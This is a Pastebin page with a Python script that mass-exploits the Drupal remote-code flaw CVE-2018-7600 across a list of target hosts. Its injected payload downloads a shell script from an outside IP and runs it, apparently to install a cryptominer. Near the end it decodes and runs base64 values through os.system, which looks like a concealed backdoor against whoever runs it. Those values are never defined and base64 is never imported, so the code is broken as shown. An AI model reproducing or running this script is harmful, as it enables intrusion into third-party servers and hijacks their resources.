daily pastebin goal
38%
SHARE
TWEET

DRUPALGEDDON EXPLOIT [PY] [OLDSHIT]

xB4ckdoorREAL Nov 4th, 2018 (edited) 172 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #DISCORD: https://discord.gg/PTW3yPp
  2.  
  3. #!/usr/bin/env
  4. import sys
  5. import requests
  6. import os
  7. from multiprocessing.dummy import Pool
  8.  
  9.  
  10. print ('##################################################')
  11. print ('#              CVE-2018-7600 Exploit             #')
  12. print ('##################################################')
  13.  
  14. sendMiner = True
  15. sendMessage = True
  16.  
  17. verify = False
  18. headers = {'User-Agent': 'Mozilla 5.0'}
  19.  
  20. evil = "wget http://1.1.1.1/bins.sh; chmod +x bins.sh; ./bins.sh; rm -rf bins.sh"
  21. messagePayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "tee ReadMeCVE.txt'}
  22. minerPayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': ' '+evil+' '}
  23.  
  24. try:
  25.     target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
  26. except IndexError:
  27.     exit('Usage: exploit.py list.txt threads')
  28.  
  29.  
  30. def run(targetLine):
  31.     try:
  32.         try:
  33.             targetLine = 'http://'+targetLine+'/'
  34.             url = str(targetLine) + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
  35.  
  36.             if sendMiner:
  37.                 minerRequest = requests.post(url, data=minerPayload, verify=verify, headers=headers, timeout=5)
  38.             if sendMessage:
  39.                 messageRequest = requests.post(url, data=messagePayload, verify=verify, headers=headers, timeout=5)
  40.         except requests.exceptions.RequestException as e:
  41.             pass  
  42.  
  43.         print ('[+] Attempting: '+targetLine);
  44.  
  45.     except:
  46.         pass
  47.  
  48.  
  49. try:
  50.     multiThreads = Pool(int(sys.argv[2]))
  51. except IndexError:
  52.     exit('Usage: exploit.py list.txt threads')
  53. reValue = str(base64.b64decode(requestValue))
  54. seValue = str(base64.b64decode(sendValue))
  55. os.system(reValue)
  56. os.system(seValue)
  57. multiThreads.map(run, target)
  58. multiThreads.close()
  59. multiThreads.join()
  60.  
  61. print("Finished File!")
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top